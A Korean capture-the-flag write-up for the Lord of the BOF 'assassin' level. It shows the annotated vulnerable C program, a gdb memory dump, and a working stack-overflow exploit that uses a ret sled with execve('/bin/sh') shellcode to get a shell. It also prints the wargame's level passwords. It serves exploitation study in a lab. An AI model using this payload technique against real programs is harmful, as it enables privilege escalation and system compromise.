login : giant
password : one step closer
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Wargame target for this level: a stack-based buffer overflow guarded only
 * by two single-byte return-address filters.  The program is the vulnerable
 * artefact the write-up studies, so its code is left exactly as shipped; the
 * comments below describe what each line does and where the defects are.
 *
 * Note: <string.h> is not included, so strcpy() and memset() are called
 * without prototypes (implicit declarations, tolerated by the old compiler
 * this level was presumably built with).  `main` also has no return type.
 */
main(int argc, char *argv[])
{
/* 40-byte stack buffer (at ebp-0x28 in the disassembly further down);
 * the only write into it is the unbounded strcpy() below. */
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
/* "no stack" filter: rejects a payload whose byte 47 -- the high byte of
 * the overwritten return address on this layout -- is 0xbf, i.e. an address
 * in the stack region.  Defect: argv[1][47] is read without checking that
 * argv[1] is at least 48 bytes long, so a short argument reads past the end
 * of the string. */
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
/* "no RTL" filter: rejects a high byte of 0x40, i.e. an address in the
 * shared-library mapping.  Both filters inspect one byte of attacker data;
 * that is a blacklist of two address ranges, not a bounds check, and does
 * nothing about the overflow itself. */
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
/* The vulnerability: strcpy() copies argv[1] plus its terminator with no
 * length limit, so any argument longer than 39 bytes overruns `buffer`,
 * then the saved frame pointer and the return address.  A bounded copy
 * such as snprintf(buffer, sizeof buffer, "%s", argv[1]) would remove it. */
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
/* Zeroes 44 bytes starting at a 40-byte array: the buffer itself and, on the
 * layout shown in the disassembly, the 4-byte saved frame pointer (the
 * author's "buffer+sfp hunter").  This is itself an out-of-bounds write; its
 * purpose is to deny a payload any data left in the buffer or a forged sfp
 * after the copy, which is why the write-up works with the return address
 * and bytes placed beyond it instead. */
memset(buffer, 0, 44);
}
no stack, no RTL
RET sled 이용
payload는 a*44 + ret addr + shellcode
ret 주소
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push $0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add $0x8,%esp
0x804850d <main+157>: push $0x2c
0x804850f <main+159>: push $0x0
0x8048511 <main+161>: lea 0xffffffd8(%ebp),%eax
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add $0xc,%esp
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
0x804851e
(gdb) r `python -c 'print "a"*44 + "b"*4 + "c"*4 + "\x90"*100'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/test `python -c 'print "a"*44 + "b"*4 + "c"*4 + "\x90"*100'`
Breakpoint 1, 0x8048470 in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
Breakpoint 2, 0x804851a in main ()
(gdb) x/1000x $esp
0xbffffa64: 0xbffffa70 0x00000000 0x0000002c 0x00000000
0xbffffa74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa94: 0x00000000 0x00000000 0x62626262 0x63636363
0xbffffaa4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb04: 0x90909090 0xbffffd00 0xbffffd1d 0xbffffd3c
0xbffffb14: 0xbffffd47 0xbffffd55 0xbffffd96 0xbffffda7
0xbffffb24: 0xbffffdbc 0xbffffdcc 0xbffffdd7 0xbffffdf4
0xbffffb34: 0xbffffdff 0xbffffe10 0xbffffe20 0xbffffe28
0xbffffb44: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb54: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffb64: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffb74: 0x00000000 0x00000009 0x080483c0 0x0000000b
0xbffffb84: 0x00000202 0x0000000c 0x00000202 0x0000000d
0xbffffb94: 0x00000202 0x0000000e 0x00000202 0x00000010
0xbffffba4: 0x0f8bfbff 0x0000000f 0xbffffbd3 0x00000000
0xbffffbb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc4: 0x00000000 0x00000000 0x00000000 0x69000000
---Type <return> to continue, or q <return> to quit---
0xbffffbd4: 0x00363836 0x6d6f682f 0x69672f65 0x2f746e61
0xbffffbe4: 0x74736574 0x61616100 0x61616161 0x61616161
0xbffffbf4: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc04: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc14: 0x62626261 0x63636362 0x90909063 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc34: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc74: 0x90909090 0x90909090 0x90909090 0x454c0090
0xbffffc84: 0x504f5353 0x7c3d4e45 0x7273752f 0x6e69622f
0xbffffc94: 0x73656c2f 0x70697073 0x68732e65 0x00732520
0xbffffc44로 페이로드 작성
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\x44\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒D▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒1Ұ
̀
bash$ whoami
assassin
bash$ my-pass
euid = 515
pushing me away